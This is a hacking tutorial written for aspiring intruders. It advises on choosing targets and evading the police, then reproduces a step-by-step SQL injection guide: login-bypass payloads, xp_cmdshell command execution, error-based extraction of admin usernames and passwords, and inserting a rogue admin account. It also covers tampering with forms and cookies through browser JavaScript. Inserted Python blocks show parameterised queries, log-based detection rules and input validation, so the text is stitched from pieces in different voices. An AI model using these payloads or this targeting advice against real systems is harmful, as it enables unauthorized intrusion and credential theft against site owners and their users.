Avinash Hacking TuT: Ok, if you want to be like the elite hackers, read this...

This is a tutorial for all of you wannabe hackers.
I will take you step by step from a noob script kiddie to a respected intermediate or elite hacker.

Chapter 1: Operating System of Choice

Ok, the three most popular operating systems used by hackers are:

Windows{WinNT/Win2k} | Mac{MAC OS X} | Linux{Backtrack Linux}

Ok, if you're not familiar with hacking on any of these OSes (operating systems), I suggest you start with Linux. The reason is that once you get used to hacking on Windows it's extremely difficult to switch. However, what you learn in Linux you can apply anywhere. So start with Linux, but if you're used to Mac or Windows that's ok.

One thing I don't want to hear from any of you is how powerful an OS is:

Windows in the hands of an elite hacker is more powerful than a fully customized, prescripted Linux in the hands of a script kiddie.

I like to use the saying: It's the player, not the cards.

And I find it to be true in hacking. The strength of your tools does not matter (to a degree; if you're using Windows 3.1x then good luck). All that matters is your skill level.

Chapter 2: Targeting And Risk Assessment

Targeting:

Let's get this right the first time, since this is the most important task you must do.
It sounds simple, right? Pick a target, hack it. WRONG!!!!

First of all, if you want to be a hacker you cannot just hack 1 site or 1 network.
You need a variety of environments and situations to shape you into an effective hacker.
No one likes a hacker that just hacks 1 network and then shows off (in fact it's better not to tell anyone you hacked the network or site, but I will go into that in Chapter 3).

Also pick something that is at YOUR SKILL LEVEL. I cannot emphasize this enough!
You could say, for example, "I want to hack www.micro$oft.com."
I would say if you don't have the brain to realise you would get caught then you're not worthy of this guide.

Risk Assessment:

This is ultimately what makes or breaks a hacker.
It is what differentiates a skilled hacker from a mad computer psychopath.

You need to be able to assess the risks involved in your future or current hacking activities.
There is always a chance of getting caught, no matter if you're using the freedom network and are on an alternating proxy script ranging across 26 countries around the world (which really is the best protection you could have).

It's composed of 33% skill assessment and 66% target assessment.

You need to know your skill level and rate it from 0 (being a complete noob) to 33 (world-class hacker).
You need to know how "strong" your target is and what tracing and policing powers it has; rate it from 0 to 66 using the table below.

To judge your target you need to do a background check on the corporation or the individual running it.

Average Salary 10% - higher pay does not necessarily mean more skill, but it is generally the case
Employment number 16% - The more people after you, the worse
Skill of Employees 20% - This is really important -- the last thing you need is an ex-world-class hacker working for the company --- that can really screw you up (trust me, I know it first hand)
Market Influence 20% - Don't go after a Fortune 500 company unless you're ready for the FBI and CIA computer crime task forces on you.


Chapter 3: Hackkits/Scripts vs Manual Portscanning/Trojan Droppers/Worms/Viruses

You need to decide whether you will be using hackkits and scripts (classified as autohacking) or the manual method, or a combination.

This is up to you, but personally I would use the manual method. This has nothing to do with the power/effectiveness of the tool; it's just I don't trust my ass to a computer script designed by someone I've never heard of.

Scroll down to download several of these that I have in my collection.


Chapter 4: SQL & Perl (Scriptable Programming Languages) Injection

My friend Sk wrote a great article on this, so I'll just borrow his work.

1.0 Introduction
When a machine has only port 80 open, your most trusted vulnerability scanner cannot return anything useful, and you know that the admin always patches his server, we have to turn to web hacking. SQL injection is one type of web hacking that requires nothing but port 80, and it might just work even if the admin is patch-happy. It attacks the web application (ASP, JSP, PHP, CGI, etc.) itself rather than the web server or the services running in the OS.

This article does not introduce anything new; SQL injection has been widely written about and used in the wild. We wrote the article because we would like to document some of our pen-tests using SQL injection and hope that it may be of some use to others. You may find a trick or two, but please check out "9.0 Where can I get more info?" for the people who truly deserve credit for developing many of the techniques in SQL injection.

1.1 What is SQL Injection?
It is a trick to inject an SQL query/command as input, possibly via web pages. Many web pages take parameters from the web user and make an SQL query to the database. Take for instance a user login: the web page takes the user name and password and makes an SQL query to the database to check if the user has a valid name and password. With SQL injection, it is possible for us to send a crafted user name and/or password field that will change the SQL query and thus grant us something else.

1.2 What do you need?
Any web browser.

2.0 What should you look for?
Try to look for pages that allow you to submit data, i.e. login pages, search pages, feedback forms, etc. Sometimes, HTML pages use the POST method to send parameters to another ASP page. Therefore, you may not see the parameters in the URL. However, you can check the source code of the HTML and look for the "FORM" tag. You may find something like this in some HTML code:
<FORM action=Search/search.asp method=post>
<input type=hidden name=A value=C>
</FORM>

Everything between the <FORM> and </FORM> tags has potential parameters that might be useful (exploit-wise).


2.1 What if you can't find any page that takes input?
You should look for pages like ASP, JSP, CGI, or PHP web pages. Try to look especially for URLs that take parameters, like:

http://duck/index.asp?id=10

3.0 How do you test if it is vulnerable?
Start with the single quote trick. Input something like:

hi' or 1=1--

into the login field, the password field, or even the URL. Example:
- Login: hi' or 1=1--
- Pass: hi' or 1=1--
- http://duck/index.asp?id=hi' or 1=1--

If you must do this with a hidden field, just download the source HTML from the site, save it to your hard disk, and modify the URL and hidden field accordingly. Example:

<FORM action=http://duck/Search/search.asp method=post>
<input type=hidden name=A value="hi' or 1=1--">
</FORM>

If luck is on your side, you will be logged in without any login name or password.

3.1 But why ' or 1=1--?
Let us look at another example of why ' or 1=1-- is important. Other than bypassing login, it is also possible to view extra information that is not normally available. Take an ASP page that will link you to another page with the following URL:

http://duck/index.asp?category=food

In the URL, 'category' is the variable name and 'food' is the value assigned to the variable. To do that, the ASP page might contain the following code (OK, this is the actual code that we created for this exercise):

v_cat = request("category")
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs=conn.execute(sqlstr)

As we can see, our variable will be wrapped into v_cat and thus the SQL statement becomes:

SELECT * FROM product WHERE PCategory='food'

The query should return a resultset containing one or more rows that match the WHERE condition, in this case, 'food'.

Now, assume that we change the URL into something like this:

http://duck/index.asp?category=food' or 1=1--

Now our variable v_cat equals "food' or 1=1-- "; if we substitute this into the SQL query, we will have:

SELECT * FROM product WHERE PCategory='food' or 1=1--'

The query should now select everything from the product table regardless of whether PCategory is equal to 'food' or not. The double dash "--" tells MS SQL Server to ignore the rest of the query, which gets rid of the hanging single quote ('). Sometimes it may be possible to replace the double dash with a single hash "#".

However, if it is not MS SQL Server, or you simply cannot ignore the rest of the query, you may also try

' or 'a'='a

The SQL query will now become:

SELECT * FROM product WHERE PCategory='food' or 'a'='a'

It should return the same result.

Depending on the actual SQL query, you may have to try some of these possibilities:

' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
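What each payload in the list above does to the article's product query, as an added example that is not part of the original article. The script builds the same concatenated statement as the ASP code in 3.1, runs every payload against it, and then runs the same lookup as a parameterised query so the two behaviours sit side by side. sqlite3 stands in for MS SQL Server here (it has no TOP and no nvarchar-to-int conversion error, so only the quoting and comment mechanics are shown), the product rows are constructed, and the function names are assumptions.

```python
import sqlite3

# Constructed sample data standing in for the article's "product" table.
SAMPLE_ROWS = [
    (1, "apple", "food"),
    (2, "bread", "food"),
    (3, "hammer", "tools"),
    (4, "soap", "household"),
]

# The payload list from section 3.1, each appended to the legitimate value
# "food" exactly as the article does with food' or 1=1--.
PAYLOADS = [
    "food",                 # legitimate input, for comparison
    "food' or 1=1--",
    'food" or 1=1--',
    "food' or 'a'='a",
    "food') or ('a'='a",
]


def make_db():
    """In-memory database holding the constructed product table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE product (id INTEGER, name TEXT, PCategory TEXT)")
    conn.executemany("INSERT INTO product VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def vulnerable_rows(v_cat):
    """Row count from the article's concatenated query, or None on a SQL error.

    Mirrors: sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
    """
    conn = make_db()
    sqlstr = "SELECT * FROM product WHERE PCategory='" + v_cat + "'"
    try:
        return len(conn.execute(sqlstr).fetchall())
    except sqlite3.OperationalError:
        # A payload that does not fit the query's shape (the ') variant against a
        # query with no parenthesis) just breaks the statement instead.
        return None


def safe_rows(v_cat):
    """Row count for the same lookup with a bound parameter.

    The driver sends v_cat as data, so quotes and -- inside it never become SQL.
    """
    conn = make_db()
    return len(conn.execute("SELECT * FROM product WHERE PCategory=?", (v_cat,)).fetchall())


def compare(payloads=PAYLOADS):
    """Map each payload to (rows from concatenated query, rows from parameterised query)."""
    return {p: (vulnerable_rows(p), safe_rows(p)) for p in payloads}


if __name__ == "__main__":
    for payload, (vuln, safe) in compare().items():
        print(f"{payload!r:24} concatenated={vuln!s:5} parameterised={safe}")
```

The legitimate value returns the two food rows either way; the tautology payloads return all four rows from the concatenated query and zero from the parameterised one, and the double-quote variant does nothing against a query that delimits with single quotes, which is why the article tells you to try several.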

4.0 How do I get remote execution with SQL injection?
Being able to inject SQL commands usually means we can execute any SQL query at will. A default installation of MS SQL Server runs as SYSTEM, which is equivalent to Administrator access in Windows. We can use stored procedures like master..xp_cmdshell to perform remote execution:

'; exec master..xp_cmdshell 'ping 10.10.1.2'--

Try using a double quote (") if the single quote (') is not working.

The semicolon ends the current SQL query and thus allows you to start a new SQL command. To verify that the command executed successfully, you can listen for ICMP packets on 10.10.1.2 and check whether any packet arrives from the server:

#tcpdump icmp

If you do not get any ping request from the server, and get an error message indicating a permission error, it is possible that the administrator has limited the web user's access to these stored procedures.

5.0 How do I get the output of my SQL query?
It is possible to use sp_makewebtask to write your query into an HTML file:

'; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"

But the target IP must have a folder "share" shared for Everyone.

6.0 How to get data from the database using ODBC error messages
We can use information from the error messages produced by MS SQL Server to get almost any data we want. Take the following page for example:

http://duck/index.asp?id=10

We will try to UNION the integer '10' with another string from the database:

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

The system table INFORMATION_SCHEMA.TABLES contains information on all tables in the server. The TABLE_NAME field obviously contains the name of each table in the database. It was chosen because we know it always exists. Our query:

SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES

This should return the first table name in the database. When we UNION this string value with the integer 10, MS SQL Server will try to convert the string (nvarchar) to an integer. This will produce an error, since it cannot convert nvarchar to int. The server will display the following error:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int.
/index.asp, line 5

The error message is nice enough to tell us the value that cannot be converted into an integer. In this case, we have obtained the first table name in the database, which is "table1".

To get the next table name, we can use the following query:

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')--

We can also search for data using the LIKE keyword:

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int.
/index.asp, line 5

The matching pattern '%25login%25' will be seen as %login% by SQL Server. In this case, we will get the first table name that matches the criteria, "admin_login".

6.1 How to mine all column names of a table?
We can use another useful table, INFORMATION_SCHEMA.COLUMNS, to map out all the column names of a table:

http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int.
/index.asp, line 5

Now that we have the first column name, we can use NOT IN () to get the next column name:

http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' AND COLUMN_NAME NOT IN ('login_id')--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int.
/index.asp, line 5

When we continue further, we obtain the rest of the column names, i.e. "password" and "details". We know this when we get the following error message:

http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' AND COLUMN_NAME NOT IN ('login_id','login_name','password','details')--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator.
/index.asp, line 5

6.2 How to retrieve any data we want?
Now that we have identified some important tables and their columns, we can use the same technique to gather any information we want from the database.

Now, let's get the first login_name from the "admin_login" table:

http://duck/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'neo' to a column of data type int.
/index.asp, line 5

We now know there is an admin user with the login name of "neo". Finally, to get the password of "neo" from the database:

http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='neo'--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'm4trix' to a column of data type int.
/index.asp, line 5

We can now login as "neo" with his password "m4trix".

6.3 How to get a numeric string value?
There is a limitation with the technique described above. We cannot get any error message if we are trying to convert text that consists of a valid number (characters 0-9 only). Let's say we are trying to get the password of "trinity", which is "31173":

http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='trinity'--

We will probably get a "Page Not Found" error. The reason is that the password "31173" will be converted into a number before the UNION with the integer (10 in this case). Since it is a valid UNION statement, SQL Server will not throw an ODBC error message, and thus we will not be able to retrieve any numeric entry.

To solve this problem, we can append some letters to the numeric string to make sure the conversion fails. Let us try this query instead:

http://duck/index.asp?id=10 UNION SELECT TOP 1 convert(int, password%2b'%20morpheus') FROM admin_login where login_name='trinity'--

We simply use a plus sign (+) to append any text we want to the password (the ASCII code for '+' is 0x2b). We will append '(space)morpheus' to the actual password. Therefore, even if we have the numeric string '31173', it will become '31173 morpheus'. By manually calling the convert() function, trying to convert '31173 morpheus' into an integer, SQL Server will throw out an ODBC error message:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '31173 morpheus' to a column of data type int.
/index.asp, line 5

Now, you can even login as 'trinity' with the password '31173'.
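What the probes from sections 3.1, 4.0, 6.0 and 6.3 look like from the server's side, as an added detection example that is not part of the original article. The script parses constructed Common Log Format lines, percent-decodes each query string once (so the %25login%25 trick decodes to %login%, as the text describes) and runs a handful of rules over it; the last sample line is an ordinary search containing the word "union" to show the rules do not fire on it. The log lines, rule names and IP addresses are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Constructed web-server log lines (Common Log Format). Lines 2-5 replay the
# article's probes against /index.asp; line 6 is a legitimate search.
SAMPLE_LOG = """\
10.10.1.5 - - [01/Jan/2005:10:00:00 +0000] "GET /index.asp?id=10 HTTP/1.1" 200 1532
10.10.1.5 - - [01/Jan/2005:10:00:02 +0000] "GET /index.asp?id=10%20UNION%20SELECT%20TOP%201%20TABLE_NAME%20FROM%20INFORMATION_SCHEMA.TABLES-- HTTP/1.1" 500 412
10.10.1.5 - - [01/Jan/2005:10:00:05 +0000] "GET /index.asp?category=food%27%20or%201%3D1-- HTTP/1.1" 200 9021
10.10.1.5 - - [01/Jan/2005:10:00:09 +0000] "GET /index.asp?id=10%3B%20exec%20master..xp_cmdshell%20%27ping%2010.10.1.2%27-- HTTP/1.1" 500 412
10.10.1.5 - - [01/Jan/2005:10:00:12 +0000] "GET /index.asp?id=10%20UNION%20SELECT%20TOP%201%20convert(int,%20password%2b%27%20morpheus%27)%20FROM%20admin_login-- HTTP/1.1" 500 412
10.10.1.7 - - [01/Jan/2005:10:01:00 +0000] "GET /search.asp?q=union+station+tickets HTTP/1.1" 200 2210
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# Each rule is matched against the URL-decoded, lower-cased query string.
RULES = [
    ("union_select", re.compile(r"union\s+(?:all\s+)?select\b")),
    ("schema_probe", re.compile(r"information_schema\.")),
    ("proc_exec", re.compile(r"\b(?:xp_cmdshell|sp_makewebtask)\b")),
    ("tautology", re.compile(r"'\s*or\s+(?:\d+\s*=\s*\d+|'[^']*'\s*=\s*')")),
    ("convert_int", re.compile(r"\bconvert\s*\(\s*int\b")),
]


def decode_query(path):
    """Query string of a request path, percent-decoded once and lower-cased."""
    _, _, query = path.partition("?")
    return unquote_plus(query).lower()


def scan_line(line):
    """(client_ip, status, [matched rule names]) or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, _ts, _method, path, status = m.groups()
    query = decode_query(path)
    hits = [name for name, rx in RULES if rx.search(query)]
    return ip, int(status), hits


def scan(log_text):
    """Alerts as {line_number: (ip, status, hits)} for lines that triggered a rule."""
    alerts = {}
    for n, line in enumerate(log_text.splitlines(), start=1):
        parsed = scan_line(line)
        if parsed and parsed[2]:
            alerts[n] = parsed
    return alerts


if __name__ == "__main__":
    for n, (ip, status, hits) in scan(SAMPLE_LOG).items():
        print(f"line {n}: {ip} status={status} rules={','.join(hits)}")
```

A 500 response paired with a rule hit is the signature of the error-based method in 6.0: the probe is designed to make the database fail, so the error that leaks the data also shows up in the web server's status code.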

7.0 How to update/insert data into the database?
When we have successfully gathered all the column names of a table, it is possible for us to UPDATE or even INSERT a new record into the table. For example, to change the password for "neo":

http://duck/index.asp?id=10; UPDATE 'admin_login' SET 'password' = 'newpas5' WHERE login_name='neo'--

To INSERT a new record into the database:

http://duck/index.asp?id=10; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (666,'neo2','newpas5','NA')--

We can now login as "neo2" with the password of "newpas5".

8.0 How to avoid SQL Injection?
Filter out characters like the single quote, double quote, slash, backslash, semicolon, and extended characters like NUL, carriage return, new line, etc., in all strings from:
- Input from users
- Parameters from the URL
- Values from cookies

For numeric values, convert them to an integer before putting them into the SQL statement, or use ISNUMERIC to make sure it is an integer.

Change "Startup and run SQL Server" to use a low-privilege user in the SQL Server Security tab.

Delete stored procedures that you are not using, like:

master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask
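The two input rules from section 8.0 (strip the listed characters from every user, URL and cookie string; treat numeric parameters as integers before they reach the statement) carried into code, as an added example that is not part of the original article. The checks are defence in depth: bound parameters remain the primary fix, and this layer exists to reject malformed input early and give the application a single place to log it. Note the deliberate choice not to rely on Python's int() as the numeric test, since int(" 10 ") and int("1_0") both succeed. The function names, the spec format and the sample requests are assumptions.

```python
import re

# Characters section 8.0 says to filter from every string taken from user input,
# URL parameters and cookies: quotes, slash, backslash, semicolon, NUL, CR, LF.
FORBIDDEN = set("'\"/\\;\x00\r\n")

# A strict integer: optional sign, 1-10 digits, nothing else. int() alone would
# also accept surrounding whitespace and underscores, which an id never needs.
INT_RE = re.compile(r"^-?\d{1,10}$")


def is_safe_text(value):
    """True if the string contains none of the characters listed in 8.0."""
    return not (FORBIDDEN & set(value))


def parse_id(value):
    """The integer an id parameter denotes, or None if it is not a plain integer."""
    if not isinstance(value, str) or not INT_RE.match(value):
        return None
    return int(value)


def validate_params(params, spec):
    """Check request parameters against a spec of {name: "int" | "text"}.

    Returns (clean, errors): clean holds converted values for parameters that
    passed, errors lists one reason per parameter that failed or was missing.
    """
    clean, errors = {}, []
    for name, kind in spec.items():
        raw = params.get(name)
        if raw is None:
            errors.append(f"{name}: missing")
        elif kind == "int":
            value = parse_id(raw)
            if value is None:
                errors.append(f"{name}: not an integer")
            else:
                clean[name] = value
        elif kind == "text":
            if not is_safe_text(raw):
                errors.append(f"{name}: forbidden character")
            else:
                clean[name] = raw
        else:
            raise ValueError(f"unknown kind {kind!r} for {name}")
    return clean, errors


if __name__ == "__main__":
    spec = {"id": "int", "category": "text"}
    # Constructed requests: one legitimate, one carrying the probes from 3.1 and 6.0.
    print(validate_params({"id": "10", "category": "food"}, spec))
    print(validate_params({"id": "10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--",
                           "category": "food' or 1=1--"}, spec))
```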


9.0 Where can I get more info?
One of the earliest works on SQL injection we have encountered is the paper from Rain Forest Puppy about how he hacked PacketStorm.
http://www.wiretrip.net/rfp/p/doc.asp?id=42&iface=6

A great article on gathering information from ODBC error messages:
http://www.blackhat.com/presentations/win-...1Litchfield.doc

A good summary of SQL injection on various SQL servers:
http://www.owasp.org/asac/input_validation/sql.shtml

SensePost's article on SQL insertion:
http://www.sensepost.com/misc/SQLinsertion.htm

Other worthwhile reading:
http://www.digitaloffense.net/wargames01/IOWargames.ppt
http://www.wiretrip.net/rfp/p/doc.asp?id=7&iface=6
http://www.wiretrip.net/rfp/p/doc.asp?id=60&iface=6
http://www.spidynamics.com/whitepapers/Whi...QLInjection.pdf

Chapter 5: JavaScript & Related

First of all, don't confuse Sun's Java™ with JavaScript!


Part 1: Inline Javascript

Using inline JavaScript the user can alter things in a website without having to leave it or save the page on his PC. This is done using the address bar of his browser. The syntax of the commands looks like this:

javascript:alert(#command#)

For example, if you want to see an alert inside the http://www.example.com site, type the URL in the address bar and when the page loads, delete the URL and type:

javascript:alert("Hello World")

as a new URL. This way an alert will show up saying 'Hello World'. However, with this technique someone can alter almost everything in a page, for example an image. Let's suppose that there is an image with the site's logo. By viewing the source of the page (this can be done by going to View > Source) we find this piece of HTML code:

<IMG Name="hi" SRC="hello.gif">

So there is an image named "hi" and its source is "hello.gif". We want to change this to "bye.jpeg", which is stored on our site http://www.mysite.com, so the full URL of our image is http://www.mysite.com/bye.jpeg
Using inline JavaScript we type in the address bar:

javascript:alert(document.hi.src="http://www.mysite.com/bye.jpeg")

You will see an alert saying http://www.mysite.com/bye.jpeg and after that the image will be changed. Notice though that those changes are temporary! If you refresh the page or enter it again your changes will be lost, because you don't alter the site on the server but on your PC.

In the same way we can view or change the value of variables. For example, we find this piece of code in the site's source:

<script LANGUAGE="JavaScript">
var a="test"
</SCRIPT>

This means that the variable with the name a has the value "test". In order to view the value of the variable we would type:

javascript:alert(a)

And in order to change it from 'test' to 'hello':

javascript:alert(a="hello")

However, inline JavaScript is mostly used for changing a form's attributes. Here is the piece of code we have:

<form name="format" action="send.php" method="post">
<input type="hidden" name="mail" value="someone@somewhere.com">
<input type="text" name="name">
<input type="submit" value="submit"></form>

We want the form to be sent to our mailbox and not to someone@somewhere.com
This can be done with this command:

javascript:alert(document.format.mail.value="me@hacker.com")

As you have noticed by now, we always use a hierarchy in the items we edit:
We start from the bigger and go to the smaller:

1) We started with document

2) We typed the name of the object we wanted to alter (for example document.hi.src) or the item in which it belonged and then the name of it (for example document.format.mail.value)

3) Lastly we ended in the attribute of the item we wanted to change (for example its source: document.hi.src, or its value: document.format.mail.value)

4) We separated the words using dots (.)

5) When we wanted to change an attribute we used the equals sign (=) and the new attribute.

*NOTE: We use "" when the new attribute is a character string (for example: document.format.mail.value="me@hacker.com")
If we wanted it to be the value of a variable we wouldn't use the "". For example, we want to change variable a's value to the value of variable b. We would type javascript:alert(a=b)

However most items in a page have no name. For example:

<form action="send.php" method="post">
<input type="hidden" name="mail" value="someone@somewhere.com">
<input type="text" name="name">
<input type="submit" value="submit"></form>

In this code the form's name is missing. Using all the above, the command would look like this:

javascript:alert(document. .mail.value="me@hacker.com")

In this case we will have to count all the forms to find out the form's number. I will use an example:

<form action="send.php" method="post">
<input type="text" name="name">
<input type="submit" value="submit">
</form>

<form action="send.php" method="post">
<input type="hidden" name="mail" value="someone@somewhere.com">
<input type="text" name="name">
<input type="submit" value="submit">
</form>

<form action="send.php" method="post">
<input type="text" name="name">
<input type="submit" value="submit">
</form>

In this code we see 3 forms, but the one we are interested in is the second. So the number of the form we want is 2.
We must not forget that we start counting from number 1. We say 1, 2, 3, 4... However, in JavaScript the counting starts from number 0. It goes 0, 1, 2, 3, etc.

So the actual number of the form is number 1, not 2. In general, find the number of the form and take away one (number-1).
We will use this number to fill in the gap in our command:

javascript:alert(document.forms[1].mail.value="me@hacker.com")

Like this you can change images or links that have no name. To do that just change "forms" to the type of item you want to change:

For images it would be:

javascript:alert(document.images[3].src="#the url of the picture you want#")

For links it would be:

javascript:alert(document.links[0].href="#the url you want#")

Lastly, we can use this technique to edit cookies.
The command is the following and was written by Dr_aMado from triviasecurity.net, but I altered it a bit so that it shows the cookie before the user edits it.

Just copy-paste this line into the address bar:

javascript:alert(window.c=function a(n,v,nv){c=document.cookie;c=c.substring(c.indexOf(n)+n.length,c.length);c=c.substring(1,((c.indexOf(";")>-1) ? c.indexOf(";") : c.length));nc=unescape(c).replace(v,nv);document.cookie=n+"="+escape(nc);return unescape(document.cookie);});alert('The cookie is: "'+document.cookie+'"');alert(c(prompt("The name of the cookie:",""),prompt("Change this value:",""),prompt("with this:","")));

** Added by Kane:
If you would like to edit your cookies manually, then this command will do that for you.

javascript:alert(document.cookie)

That will show you your current cookie. Say, for example, that it is 'userid=1'. You want to change that to 'userid=2'. You would use the following command:

javascript:alert(document.cookie="userid=2")

** Back to original article

In conclusion, I must stress that the changes are made only on the user's side! It's like saving the site on your PC and then modifying it. However, using this technique you can trick a page (for example with cookies) or get past a page's referrer check.

For example, some pages check where the user sends the data from. Specifically, if the data from http://www.test.com/form.php was sent to http://www.test.com/check.php, check.php would possibly check if the data was sent from the form in http://www.test.com/form.php.
Apart from that, if you manage to enter your own JavaScript code into a page, using something like this technique you will be able to alter pictures and stuff like that permanently!
However, you need more knowledge than what is provided here.
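The conclusion above is the whole defensive lesson of Part 1: everything the address bar changes (a hidden mail field, a userid cookie) arrives at the server as untrusted input. Here is what the receiving side of the article's send.php form looks like when it takes that seriously, as an added example that is not part of the original article. The recipient address is server configuration rather than a hidden field, so the javascript:alert(document.format.mail.value=...) edit has nothing to act on, and the userid cookie carries an HMAC so the javascript:alert(document.cookie="userid=2") rewrite is rejected. The signing key, recipient address, function names and sample requests are constructed for this example.

```python
import hashlib
import hmac

# Assumptions for this example: the key lives only on the server (a constructed
# placeholder here) and the real destination is server configuration, so the
# hidden "mail" field in the article's form carries no authority at all.
SERVER_SECRET = b"constructed-example-key-not-for-production"
RECIPIENT = "inbox@example.com"


def _mac(name, value, key):
    return hmac.new(key, f"{name}={value}".encode(), hashlib.sha256).hexdigest()


def sign_cookie(name, value, key=SERVER_SECRET):
    """Cookie string 'name=value.mac' that the server can later verify."""
    return f"{name}={value}.{_mac(name, value, key)}"


def verify_cookie(cookie_header, name, key=SERVER_SECRET):
    """Verified value of cookie `name` from a Cookie header, or None if absent or tampered."""
    for part in cookie_header.split(";"):
        k, _, v = part.strip().partition("=")
        if k != name:
            continue
        value, _, mac = v.rpartition(".")
        # A cookie rewritten from the address bar (userid=2) has no MAC, or keeps
        # the MAC computed for the old value; either way the comparison fails.
        if hmac.compare_digest(mac, _mac(name, value, key)):
            return value
        return None
    return None


def handle_send(form, cookie_header):
    """Server-side handling of the article's send.php target.

    form is the POSTed field dict; cookie_header is the request's Cookie header.
    """
    userid = verify_cookie(cookie_header, "userid")
    if userid is None:
        return {"status": 403, "reason": "missing or tampered session cookie"}
    name = (form.get("name") or "").strip()
    if not name or len(name) > 100:
        return {"status": 400, "reason": "name missing or too long"}
    # form.get("mail") is never consulted: the recipient is fixed server-side.
    return {"status": 200, "to": RECIPIENT, "user": userid, "name": name}


if __name__ == "__main__":
    good = sign_cookie("userid", "1")
    print(handle_send({"mail": "me@hacker.com", "name": "Alice"}, good))
    print(handle_send({"name": "Alice"}, "userid=2"))                             # cookie rewritten
    print(handle_send({"name": "Alice"}, good.replace("userid=1.", "userid=2.")))  # value edited, MAC kept
```

The referrer check the text mentions is weaker than either measure, since the Referer header is also client-supplied; a signed session value and a server-side recipient do not depend on anything the browser chooses to send.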

Part 2: Javascript Debate - An interesting Article about the meaning of Inline Javascript

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Semantics of Javascript Injections
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

By JoeyAdms


Why are JavaScript injections taking heat over meaning, why do people argue over whether it is logical to call them this, and how can these disputes be disproved?

First and foremost, what is JavaScript?

JavaScript is a scripting language developed by Netscape as a simplified scripting language for use in HTML documents. Most modern-day browsers have interpreters that allow JavaScript actions to be executed. Although it is cast in exile, it serves a purpose for determining browser/OS type for use with Cascading Style Sheets, and for the few who can actually use it proficiently, it can be a powerful server- and client-side tool. As simplified as it is, JavaScript's compliancy and capabilities make any browser with it enabled and no rules set a ticking time bomb.

Inline Javascript
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

[q]People argue that "Inline Javascript" is the process of putting JavaScript commands in a line in the browser's URL bar.
[a]FALSE!

Inline JavaScript is the process of running JavaScript commands on the fly, as in this example.
<input type="button" value="Hello" onClick="alert('Hello World!');" />

JavaScript does not have to be formatted in between script tags, and can be used in simple situations as shown above; this use is called inline JavaScript.

Through the browser:
As I mentioned, most modern-day browsers have JavaScript capabilities. A test example is below:
javascript:alert('Hello World');

This invokes the browser's JavaScript interpreter and executes commands on the client document.
This should be considered the same thing as running "perl helloworld.pl" from the command line interface.

Developers commonly use this form to test variables set by the server/page requested. (Cookies,Sessions, etc.)


Why Javascript Injection is Called Javascript Injection
::::::::::::::::::::::::::::::::::::::::::::::

[q]Ok, so I said that I am running commands on the client side by using the browser technique, so why is this considered JavaScript injection? It is doing nothing to the page at hand.
[a]WRONG!


Consider this as an html document. (trimmed for format)

<!DOCTYPE html>
<html>
<head>
</head>
<body>
<p>Hello World</p>
</body>
</html>

Now say we run ( javascript:alert('hello world'); ) in our browser. You may think this changes nothing, but what you should be doing is visualizing our same HTML document looking like this now.

<!DOCTYPE html>
<html>
<head>
<script type="text/javascript">
alert('hello world');
</script>
</head>
<body>
<p>Hello World</p>
</body>
</html>

I will leave the next arguments up to you; however you argue with what I have just said, it can be explained by the following.
